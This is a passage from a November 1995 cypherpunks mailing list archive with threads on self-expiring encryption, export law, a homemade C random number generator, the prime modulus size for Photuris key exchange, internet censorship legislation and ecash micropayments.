I suspect that the laws of thermodynamics might prohibit this
in classical cryptography because as a message expired the 
amount of entropy would decrease.  Quantum cryptography
might work, but that will be science fiction for some time to
come.

Has anyone either shown how to do this or proven it impossible?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 8 Nov 1995 22:17:03 +0800
To: John Curtis <jbell@capecod.net>
Subject: Re: expiration dates on cryptography
In-Reply-To: <01BAADAA.DFB5F740@hy36.capecod.net>
Message-ID: <199511081406.JAA00267@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



John Curtis writes:
> The discussion between Mr. May and Mr. Shields concerning
> time-release cryptograhy raised an interesting question in my 
> mind.
> 
> Given that trust is often of an ephemeral nature, it would be
> quite useful to set time limits on secrets.  Would it be possible
> to cryptographically protect a secret such that it could not be
> decrypted after a certain time?

No.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 8 Nov 1995 22:19:22 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
In-Reply-To: <199511080306.TAA10540@jobe.shell.portal.com>
Message-ID: <199511081408.JAA00279@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> I wish that Detweiler could (seriously) go back to wherever he came from. 

What a fascinating statement to make, considering that you are
probably Detweiler.

> Alice de 'nonymous ...
> 
>                                   ...just another one of those...
> 
> 
> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Thu, 9 Nov 1995 08:09:21 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <199511080054.QAA29419@email.pdcorp.com>
Message-ID: <199511081517.JAA00972@galil.austnsc.tandem.com.>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@lighthouse.homeport.org> said:

AS> 	Thus, if the user in Italy has no reason to expect that their
AS> mail to Germany will traverse the US, then I suspect that the US
AS> would have a hard time proving any criminal act.  Doesn't a criminal
AS> act require intent of some type?  If IP routing, in conjunction with
AS> SMTP, beyond the control of the users, ships packets through the US,
AS> I have a hard time believing that that makes those users criminals.

	IANAL, but if they have the intent to transfer cryptographic
software, and can 'reasonably' (wonderful precision there) be expected
to know that there is the potential for portions of the transfer to be
routed through US systems, then I'm guessing that it could be construed
that they had the intent to commit a crime.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Thu, 9 Nov 1995 08:19:58 +0800
To: John Curtis <jbell@capecod.net>
Subject: Re: expiration dates on cryptography
Message-ID: <199511081549.JAA28561@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:21 AM 11/8/95 -0500, John Curtis wrote:
>Given that trust is often of an ephemeral nature, it would be
>quite useful to set time limits on secrets.  Would it be possible
>to cryptographically protect a secret such that it could not be
>decrypted after a certain time?
   It's a nice idea, really.  The problem is - how do you verify the
absolute time?  For instance, by resetting a PC's internal clock
you can instantly circumvent that measure.  Possibly by forcing
the application to consult a "reliable" clock like one of the
cesium clocks, but that could be hacked.
   Unless you can absolutely, reliably, and without fear/danger of
being hacked around, verify the correct time, self-destruct crypto
probably won't happen.
----- David E. Smith, dsmith@midwest.net, PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 9 Nov 1995 08:10:33 +0800
To: whitaker@sover.net
Subject: Re: toolkits?
Message-ID: <9511081640.AA27938@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain




> >
> >Third - provide services to the citizenry.  For example - provide
> >a public key server.  Or how about a digital time-stamping service.
> >If the crap was kept out of these services, and they were free for
> >anyone to use, then it would advance the idea of encouraging people to
> >use crypto in their daily lives.
> >
> 
> Now were getting specific. These are things that us ordinary folk can do
> which show the 'leaders' how to follow. What software, hardware,
> applications, support and sysadmin experience is required and where is it
> available on what terms. What are the cash flow opportunities to support
> such services?

PGP Public key servers - see MIT's key server as a good example.
Digital time-stamping service - see Betsie (sp?) from Bellcore 
as a basis.  These are things that are already out there, BUT 
I think that we can use more services like this.  Comercially
there probably isn't the demand to support these yet, but I think
we have a chicken and the egg problem here.  People can't use
encryption easily if they don't have good access to the tools, 
but people won't demand services like key-servers until they 
start useing the tools.

A good service would be to provide and support distribution of 
of privacy enhancing tools to universities and companies that
want them.  i.e. have people who will help set up firewalls,
PGP, encrypted telnet (pick your flavor), etc. 

A state wide group that has grants to provide internet connectivity
for universities and companies could have a person that does
nothing but work with these companies to help incorporate 
encryption into their networks. For instance, my employeer 
has hardware engineers putting VLSI designs on tape, and then
fed-ex'ing them to the chip manufacturer, because they can't 
get good encryption set up that allows secured ftp transfers.
(and get the manufacturer to agree to the same encryption 
technology, etc. etc. etc.)

Yes - I know that most of this stuff is out there already,
but having people *willing* to integrate it for you without
charging an arm and a leg would go a long way towards convincing the
suits that this is a *good* thing.  

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 9 Nov 1995 00:06:45 +0800
To: dreschs@mpd.tandem.com (Sten Drescher)
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <199511081517.JAA00972@galil.austnsc.tandem.com.>
Message-ID: <199511081544.KAA06043@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Since the size of the net is more than doubling each year,
over half the people online at any given time are newbies.*  It is not
reasonable to expect a newbie to understand IP routing.  Neither IP
routing nor the design of the backbone is intuitively obvious.
Therefore, it is not reasonable to assume that a user in Italy or
Germany has any idea that their packets might travel through the
United States.  

	Nor is it reasonable to assume that a user outside the US is
familiar with the ITARs.  They're an obscure set of regulations, on
the surface contrary to the First Amendment, and not even well known
within the United States.

	I find it hard to believe that given the obscurity of IP
routing, the backbone design, and the obscurity of the ITAR that a
jury would find a foreign person guilty of unknowingly violations of
the ITAR.  Any comment on this line of reasoning from our lawyer
friends?

Adam


Sten Drescher wrote:
| Adam Shostack <adam@lighthouse.homeport.org> said:
| 
| AS> 	Thus, if the user in Italy has no reason to expect that their
| AS> mail to Germany will traverse the US, then I suspect that the US
| AS> would have a hard time proving any criminal act.  Doesn't a criminal
| AS> act require intent of some type?  If IP routing, in conjunction with
| AS> SMTP, beyond the control of the users, ships packets through the US,
| AS> I have a hard time believing that that makes those users criminals.
| 
| 	IANAL, but if they have the intent to transfer cryptographic
| software, and can 'reasonably' (wonderful precision there) be expected
| to know that there is the potential for portions of the transfer to be
| routed through US systems, then I'm guessing that it could be construed
| that they had the intent to commit a crime.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 9 Nov 1995 09:00:27 +0800
To: cypherpunks@toad.com
Subject: DUF_ibf
Message-ID: <199511081552.KAA06338@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Pal has provided a gopher-FBI paper:


   "Computer Crime Categories: How Techno-criminals Operate."
   By David L. Carter, a professor in the School of Criminal
   Justice, Michigan State University

   Types of Computer Crimes

      Computer As the Target
      Computer As the Instrumentality of the Crime
      Computer Is Incidental to Other Crimes
      Crimes Associated With the Prevalence of Computers

   Perspective on Legal Issues

   Special Problems with Computer-Related Crime

      Intellectual Property
      Malfeasance by Computer
      International Issues

   Conclusion

      Criminals have adapted the advancements of computer
      technology to further their own illegal activities.
      Unfortunately, their actions have far out-paced the
      ability of police to respond effectively.


   DUF_ibf  (21 kb in two parts)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 9 Nov 1995 08:10:01 +0800
To: Frank Andrew Stevenson <frank@funcom.no>
Subject: Re: True Random (short c-source)
In-Reply-To: <Pine.SGI.3.91.951108165325.25592A-100000@odin>
Message-ID: <199511081613.LAA00447@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



What you are doing, basically, is using the processor execution time
loops to measure jitter in the return of the value of clock(). I don't
know how clock() works but I would venture to guess that the jitter in
more predictable than you think.

.pm

Frank Andrew Stevenson writes:
> I have written a short random number generator which appears to produce
> reasonable random numbers even in DOS, at the heart of the code is the
> short function fGetRand, the amount of entropy derived from this
> function varies from >1 to >>6 depending on system load, I haven't
> made any effort to whiten it at all. I am not making any claims about
> its usefulness. I am only trying to demonstrate the ease at which
> good random number may be obtained. Any comments and analysis will be
> mostly welcome, the source is hereby placed in the public domain:
> 
> I have used WATCOM10 to compile and test under DOS/WIN95, where
> clock is running at 18hz. I have also tested on IRIX with impressive
> results.
> 
> --- START ----
> #include <time.h>
> #include <stdio.h>
> 
> int   fGetRand (void);
> 
> main (void) {
>    long vCount;
>    FILE *out;
>    int byte;
>    int tick;
> 
>    out=fopen("random.bin","wb");
>    if(out==NULL) {
>       printf("cant write to file random.bin\n");
>       exit(1);
>    }
> 
>    for(vCount=1;vCount<=512;vCount++) {
>       tick=fGetRand()&0x01;
>       byte=byte+byte+tick;
>       if((vCount & 0x7)==0) fputc((char)byte,out);
>       fputc((char)tick,out);
>    }
> 
>    fclose(out);
> }
> 
> 
> int   fGetRand (void) {
>    int count;
>    clock_t tick;
> 
>    tick=clock();
>    while(tick==clock()) count++;
> 
>    return (count);
> }
> ----- END -----
> 
> PGP encrypted mail preferred, finger for key.
> The above views are ONLY endorsed by BoggleMind Inc. (not to be confused
> with MindBoggle Ltd.)
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 9 Nov 1995 08:42:22 +0800
To: cypherpunks@toad.com
Subject: Re: expiration dates on cryptography
Message-ID: <acc62dde07021004cd59@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:21 PM 11/8/95, John Curtis wrote:
>The discussion between Mr. May and Mr. Shields concerning
>time-release cryptograhy raised an interesting question in my
>mind.
>
>Given that trust is often of an ephemeral nature, it would be
>quite useful to set time limits on secrets.  Would it be possible
>to cryptographically protect a secret such that it could not be
>decrypted after a certain time?

An interesting twist.

There are two broad things to consider:

1. Cryptography, what can mathematically be done.

2. Economics and social systems, what "business ecologies" can do.

Pure cryptography is about #1, with minimal consideration of #2. Much of
what interests me involves #2.

How this relates to your interesting question goes as follows.

Even the "timed-release cryptography" is NOT a pure cryptographic system,
as the idea of "temporal state" in crypto is iffy. That is, clocks can be
jiggered. Even "sealed clocks" can be jiggered.

But just as Haber and Stornetta's "digital timestamps" use time, such a
thing is possible once _economic agents_ enter the picture. And once
economic considerations are used.

The "timed-release crypto" system depends for its security on the
likelihood that N agents holding pieces of something--something they don't
know the value of--will likely hold those pieces for as long as they are
being paid.

(If you want to discuss why this is likely, even in a world of mistrust and
malice, we can discuss it.)

"Self-destruct crypto" would work roughly the same way:

-- N agents holding pieces of puzzle, contracted to destroy those pieces on
such-and-such date.

It is likely that some or even all of them would comply, if properly paid.

Caveats:

1. Sure, they could make backups. Probably do. But just as archival files
are shredded, a system for eliminating "expired" files would be possible.

2. Sure, they could cheat. Ditto for "timed-release crypto." (Time is
symmetric for this problem.)

3. Again, the security of the system to a large extent depends on the N
agents not knowing what the pieces are part of, nor knowing who the other
holders are. They never know whether a given piece is part of an audit, a
test, etc.

4. There is a slight asymmetry, despite what I said, in that one can "test"
agents to see if they'll release their pieces as contractually obligated
to, but one can never be sure that agents have actually destroyed their
pieces.

5. Still, distributing a secret amongst, say, 30 agents and having them
"agree" to destroy their pieces on January 20, 2002, seems pretty likely to
result in the collective secret (n-out-of-m pieces) being recoverable after
that date.

Such a system would need more consideration of backup strategies, etc. (If
everyone is carefully backing up and the backup tapes are somewhere, then
quite clearly the secret would not be gone; hence the issue of backup
strategies.)


>I suspect that the laws of thermodynamics might prohibit this
>in classical cryptography because as a message expired the
>amount of entropy would decrease.  Quantum cryptography
>might work, but that will be science fiction for some time to
>come.

I'm always interested in the links between information theory, algorithmic
complexity, and notions of entropy, but I am skeptical in the extreme that
the "laws of thermodynamics" have anything to do with whether one can throw
away bits. If I make a list on my computer, and then erase it, have I
violated a "law of thermodynamics"? Of course not.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Thu, 9 Nov 1995 08:44:18 +0800
To: stewarts@ix.netcom.com
Subject: Re: PGP Comment feature weakens remailer security
In-Reply-To: <199511080454.UAA05765@jobe.shell.portal.com>
Message-ID: <199511081943.LAA24863@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   Point well taken.

   I'm seriously considering completely disabling the PGP comment
feature when invoked from premail. In fact, that's what the new code
does right now.

   On an unrelated topic... cypherpunks like to count bits, right?
What is the correct number of pseudorandom bits to use in a MIME
multipart separator? If the data has a line which matches the
separator, the message is corrupted. Of course, if you can take
multiple passes through the data, you can simply verify that it does
not contain a line which matches the separator. But if you're
restricted to a single pass, then the only way to do it is to use a
randomly generated separator.
   I figure that 128 bits should _definitely_ be enough (that's what
is in the new premail code now). Even 64 bits should ensure that it is
unlikely that anyone will ever experience message corruption over the
expected lifetime of premail. However, it makes me nervous. What do
people think?

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 9 Nov 1995 07:47:54 +0800
To: cypherpunks@toad.com
Subject: November Bay Area meeting? was: Decemeber SF Bay Area Cyperpunks
In-Reply-To: <199511080549.VAA04978@anemone.corp.sgi.com>
Message-ID: <47qmok$nnk@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511080549.VAA04978@anemone.corp.sgi.com>,
Katy Kislitzin  <ktk@anemone.corp.sgi.com> wrote:
>Hi--
>
>Eric Messick and I will be holding the Decemeber C'punks meeting at
>our geodesic dome in the Santa Cruz Mountains.  It will be a
>combination meeting and holiday get-together.  It will be happening on
>the usual c'punks saturday, Dec 9, but will start at 4:00 pm instead
>of the usual noon.  A more spirited announcement will follow closer to
>the date.

Speaking of which, did I miss an announcement of the November meeting?
My mail server was down for a few days, so it's entirely possible.
If that's the case, can someone repost it or send it to me?

Thanks,

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 9 Nov 1995 08:42:49 +0800
To: John Curtis <jbell@capecod.net>
Subject: Re: expiration dates on cryptography
Message-ID: <199511082002.MAA25560@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[ Hmmm, maybe I'd better get this message out quickly, before it expires... :-]

At 07:21 AM 11/8/95 -0500, John Curtis <jbell@capecod.net> wrote:
>The discussion between Mr. May and Mr. Shields concerning
>time-release cryptography raised an interesting question in my 
>mind.
>
>Given that trust is often of an ephemeral nature, it would be
>quite useful to set time limits on secrets.  Would it be possible
>to cryptographically protect a secret such that it could not be
>decrypted after a certain time?

Decryption is equivalent to knowing a secret plus doing some work.

There are two ways to make information available/unavailable -
by depending on calculations from known data, or by having people
agree to publish/delete it.  The former method is trustable,
but doesn't have time built in to it - either you know stuff or you don't.
The latter method is harder to trust - you can build contractual mechanisms
to encourage people to keep their commitments, and use crypto methods like
splitting shared secrets to limit the impact of some of them not keeping them -
but it's basically not cryptographic.  

Getting people to keep information secret for a while and then publish
is possible; that's within their control.  Getting people to keep information
public, and then delete all the copies they own is possible, but if the
information is _public_, anybody in the world could have a copy - deleting
it requires finding them all, and getting them all to agree to delete it.
That's _much_ harder.

You could build a system where an escrow agent keeps a piece of information
private, but available upon request, and deletes it on a certain date.
That lets you know that _if_ nobody's asked for the information by then,
and the agent has done its job, that nobody else will be able to decrypt it.
Again, you can secret-share among multiple agents to decrease the impact
of defaults (either failure-to-delete or failure-to-deliver.)

A related approach is for the agent to provide a service of decrypting data
encrypted with the agent's public key, and agreeing only to decrypt data
before or after some date specified in the message.

Another technique you can use is to for the agent to keep the data until
paid for delivery; the retrieval token includes a digital check
with an expiration date.  In this case, you're trusting the bank to 
not honor the check after its expiration date, and the escrow agent not to
deliver the data without getting paid.  For this service, you want checks
rather than cash - if the check goes stale, the money is still in your account.

#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Thu, 9 Nov 1995 08:09:16 +0800
To: karn@qualcomm.com
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511080143.RAA22564@servo.qualcomm.com>
Message-ID: <9511081704.AA24263@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Tue, 7 Nov 1995 17:43:49 -0800 (PST)
   From: Phil Karn <karn@qualcomm.com>
   Cc: cypherpunks@toad.com, ipsec-dev@eit.COM

   > Our practical experiences with discrete logs suggests that the effort
   > required to perform the discrete log precomputations in (a) is slightly
   > more difficult than factoring a composite of the same size in bits.  In
   > 1990-91 we estimated that performing (a) for a k-bit prime modulus was
   > about as hard as factoring a k+32-bit composite.  [Recent factoring work
   > has probably changed this a bit, but it's still a good estimate.]

   This is also my understanding, which I got from you in the first
   place.  I take it there have been no dramatic breakthroughs in the
   last few years in the discrete log problem? How heavily has it been
   studied in comparison with factoring?

Factoring has received more attention than discrete log; certainly when
it comes to net-wide computations it's all factoring.  But that's partly
due, I think, to a lack of targets to attack.  

   Still, requiring support of a fixed modulus for shared public use is
   important to promote a basic level of interoperability. This has its
   risks, but it should be okay *provided* it's a strong prime of
   sufficient strength to preclude the precomputation of the discrete log
   tables by even a highly motivated and resourceful attacker. And as a
   backup the protocol should provide for the optional use of private
   moduli between consenting parties. Sound reasonable?

You definitely should allow any modulus between consenting parties.  As
for what moduli the standard says "must be" (vs. "should be") supported,
I don't know.  Maybe the right thing to do is require conforming
implementations to support a large modulus but include recommended
smaller moduli.  Then Alice can always force Bob to use the large
modulus but, if both agree, they can use something smaller from the
standard or even their own home-grown modulus.

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Thu, 9 Nov 1995 08:15:34 +0800
To: cypherpunks@toad.com
Subject: Photuris 512bit Prime Challenge? (Re: Photuris Primality verification needed)
Message-ID: <v02130501acc6820ddefd@[204.144.184.50]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hilarie Orman <ho@cs.arizona.edu> wrote:

>>  Well, since we already require 56-bit DES in ESP in the interests of
>>  promoting basic interoperability, wouldn't a 512-bit prime be
>>  similarly sufficient?
>
>If you are willing to accept that in all likelihood, one year from
>now, some group will announce that can "crack" all key exchanges that
>using the published modulus, then sure, call it sufficient.

Sounds like someone just threw down a gauntlet.

Is it even possible to do the precomputations in a distributed manner in
less than a year or two?  Or maybe starting a few years down the road?
It would be nice to give Photuris a chance to get established before the
least common denoninator shared modulus gets taken out, if we even can
take it out.


Richard

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKDVvfobez3wRbTBAQHpkgP9Fg+MGMz8U6Bisv45PZohoZxWbiEYuxJK
tg8oHD8TZRQsuqCwveWFRTnmPGiGKs2cBs5ZKXkFNU6ot7lZLO8d/1BSSjo0yX2Q
0FSXDSaBjUKIFcjHHGYBWrZZ+gjc/bdab94EqQvmFSUmAp73/mnKZgcyUPGL3Cmt
MW3jZhlVMdw=
=bfsQ
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Thu, 9 Nov 1995 08:28:22 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Bruce Schneier's Applied Cryptography, 2nd Edition
In-Reply-To: <acbf8a88070210047acb@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951108145313.367A-100000@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 3 Nov 1995, Timothy C. May wrote:

> At 2:48 PM 11/3/95, Ray Arachelian wrote
> >Now does anyone want my old 1st edition? :-)
> 
> I am interested. I will trade five (5) slightly used prime numbers for it.
> 
> (Has anybody ever thought about using prime numbers as a medium of barter
> in a digital economy? Think of the labor that would be saved if we all
> didn't have to compute our own!! :-})

Sure, why not.  As soon as someone offers something I'd like to get, for 
which they would like the five even more slightly used primes. :-)  But 
seriously, it'll be cool to trade for the book and get something useful 
I'd want anyway...  If not I'll probably chuck it to the public library 
with a post it note that says Anonymous Donation. :-)

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
===================http://www.dorsai.org/~sunder/=========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 9 Nov 1995 08:23:57 +0800
To: cypherpunks@toad.com
Subject: Return of the Cyber-Censors
Message-ID: <199511082002.PAA13786@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Washington Post, November 8, 1995.


   Return of the Cyber-Censors [Editorial]

   When the Senate passed its ill-advised "Exon amendment" to
   the telecommunications bill last spring, which would
   criminalize the transmission of obscene, pornographic or
   "indecent" material on the Internet, the measure got an
   overwhelming 84 votes, many of them from senators who
   didn't understand the implications of the move. Only a few
   weeks later, the House went even more overwhelmingly the
   other way, voting 420 to 4 for an amendment (co-sponsored
   by Reps. Ron Wyden and Christopher Cox) that would bar the
   Federal Communications Commission from regulating
   cyberspace and would instead make it legally easier for
   commercial Internet providers to use their own technical
   tools to regulate questionable material.

   The contrast was the result of a burst of public discussion
   in which more technologically astute members, including
   House Speaker Newt Gingrich, caught on to the disturbing
   fact that the kinds of far-reaching liability imposed by
   Sen. James Exon's formulation -- hastily adapted from an
   existing measure on telephone transmission -- would cripple
   practically any commercial Internet provider and
   effectively lame the new medium as a venue for moneymaking
   activity.

   Now these vastly different measures are in conference
   committee along with the rest of the telecommunications
   bill (in other areas of which, we remind readers once
   again, The Washington Post Co. has some interests). But the
   seeming clarity afforded by the House response to the Exon
   amendment and by Mr. Gingrich's appreciation of the need
   for untrammeled development of the new medium is nowhere to
   be seen. A letter from Christian Coalition head Ralph Reed,
   Phyllis Schlafly and other prominent spokesmen for the
   religious right is urging the conferees toward an
   Exon-style approach that's as destructive now as it ever
   was. The House bill also could end up including an
   amendment sponsored by Rep. Henry Hyde that adds some
   criminal liability to the transmission of obscene (but not
   "indecent") images via the new technologies.

   The argument against "criminalizing" the transmission of
   "indecent" images via the Internet remains stark and
   simple, and it goes not to the awfulness of child
   pornography or even to the ability of parents to control
   what their children do on the computer (a wide variety of
   off-the-shelf technological filters now exist that let
   parents do this themselves) but to the impossibility of
   regulation by the electronic middleman industries that are
   developing.

   Commercial providers such as America Online continue to
   pass along millions of messages a day, the interactive
   "newsgroups" unfold quickly and internationally, and the
   kind of central filtering envisioned by would-be regulators
   erases the very quality that makes the Internet a live and
   promising medium -- its inexpensive accessibility. If the
   Internet were like a telephone system, there would at least
   be the possibility of identifying a specific "sender" and
   "recipient." On the Internet it's "receivers" who do the
   selecting of what to look at and where. Giving those
   recipients the tools they need remains the way to go. The
   conferees should resist the urge to censor cyberspace.













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 9 Nov 1995 09:13:43 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
Message-ID: <199511082306.PAA24448@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Nov 1995, Perry E. Metzger wrote:

> anonymous-remailer@shell.portal.com writes:
> > I wish that Detweiler could (seriously) go back to wherever he came from. 
> 
> What a fascinating statement to make, considering that you are
> probably Detweiler.

Fascinating.  

First, I'm accused of being noted computer viral expert, 
Dr. Frederick B.  Cohen, (simply because he agrees with my assessment of
the critical algorithm flaw in Netscape Navigator) and now I'm accused of
perhaps being at the other end of the spectrum.  Of being Detweiler,
simply because he can take my signature and identity by signing an email,
as Alice de 'nonymous or simply accusing me of posting in his "style". 

I see that the character assassination sport continues, and I am now a
targetted.  Hunter become hunted.  I wonder why??  And why, by of all
people, Perry?  Is it perhaps because, I speak the truth, and the truth
makes people very, very nervous.  Is it because the flaw which is in the
Navigator product is woven into the code fabric, and can't be *fixed*. 

Afterall, Netscape (and AT&T) have had, over THREE WEEKS to work on this
problem or to make some form of public comment, and have done nothing, but
put some of their programmers -- unofficially ... speaking for myself ...
not speaking for the Company -- programmers on this list

Meanwhile people are having their PGP keyrings collected, their passwords
monitorred, and all of the information -- even information which they have
NOT posted to Usenet, information that is simply on their personal hard
drives, or on a private corporate network that is behind a firewall --
collected by anyone who actualy understands *how* to use Netscape
Navigator's standard features to do it. 

And so the question is: Why am I having my character asassinated while
this threat continues??  And while the loss and damage continues.  Why
are Netscape and AT&T not mitigating the damage?

Is it because what I say is simple common sense stripped of the veneer of
"technical language" and jargon??  And can't be *commented* on or *fixed*. 

Is this the fear which any truth teller faces, not only on the Internet,
but in any forum where they try to challenge Goliath. 

Maybe, that's one reason to post anonymously.

To clear the record definitively, I am neither Detweiler nor Dr.
Frederick B. Cohen, and I am not the issue.  I am simply myself, and I
will _reveal_ my identity to the international public once the timing
is appropriate.

If anyone wants to know who I am, they can contact the PR department
of AT&T or Netscape and ask.

(Their address can be requested from either postmaster@att.com or 
postmaster@netscape.com, respectively.)

Both companies have an email address for me, and would _likely_ *cough*
forward any email enquiries to me without any editing.  That way,
everything is done clearly and out in the open.  Nothing hidden, and
nothing private, and none of my comments will become "their sole property
to be used in their sole discretion". 

Neither company can accuse me of attacking them with daggers in the
dark of night, from behind a shield of anonymity, when I advocate
public open disclosure and commentary.




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 9 Nov 1995 08:11:49 +0800
To: Richard.Johnson@colorado.edu (Richard Johnson)
Subject: Re: Photuris 512bit Prime Challenge? (Re: Photuris Primality verification needed)
In-Reply-To: <v02130501acc6820ddefd@[204.144.184.50]>
Message-ID: <199511082020.PAA09434@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Richard Johnson writes:
> Hilarie Orman <ho@cs.arizona.edu> wrote:
> >If you are willing to accept that in all likelihood, one year from
> >now, some group will announce that can "crack" all key exchanges that
> >using the published modulus, then sure, call it sufficient.
> 
> Sounds like someone just threw down a gauntlet.
> 
> Is it even possible to do the precomputations in a distributed manner in
> less than a year or two?

I would guess that it probably is. However, there is no point in
trying to do this yet since I suspect that Phil and Bill can be
convinced that its a bad idea to specify a 512 bit modulus.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 9 Nov 1995 09:35:07 +0800
To: cypherpunks@toad.com
Subject: ecash speed
Message-ID: <199511082345.PAA02628@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


A few days ago I got my ecash account set up with the Mark Twain bank.
Presently only one merchant is officially listed at <URL:
http://www.marktwain.com/shops.html>, Delorie Software.  As I understand
it, only people with merchant accounts are eligible to be listed here.
However, you don't have to have a merchant account to receive ecash or to
set up shop software.  If anyone else has set up a shop to receive Mark
Twain ecash using a user account, perhaps they could post here and we
could keep a list of unofficial vendors.

The other thing I wanted to write about is ecash speed.  One idea people
have had is to use ecash for micropayments, such as one cent to read a
web page.  The question is, is the current ecash software sufficiently
fast for this?  Maybe someone could set up a site using either Twain ecash
or DigiCash ecash which actually charged you a penny for each page you
browsed around.  It would be interesting to see how much of an obstacle
it presents in browsing the web.  The impression I've had from the few
times I've used ecash is that in fact it does slow things down way too
much for this to be practical.  But it would be good to actually do the
experiment.

One reason I was thinking about this is reading a new paper by Rivest and
Shamir, <URL:http://theory.lcs.mit.edu/~rivest/RivestShamir-mpay.ps>.  It
is about a couple of proposed systems for micropayments, specifically
oriented towards the penny-per-web-page model.  They are offline systems,
designed so that a minimum of calculation is done by the vendor, user and
bank.  So they should be very efficient.

However, the big problem is that they are not anonymous.  The cash
tokens are recognizable by the bank when spent tokens are sent in by
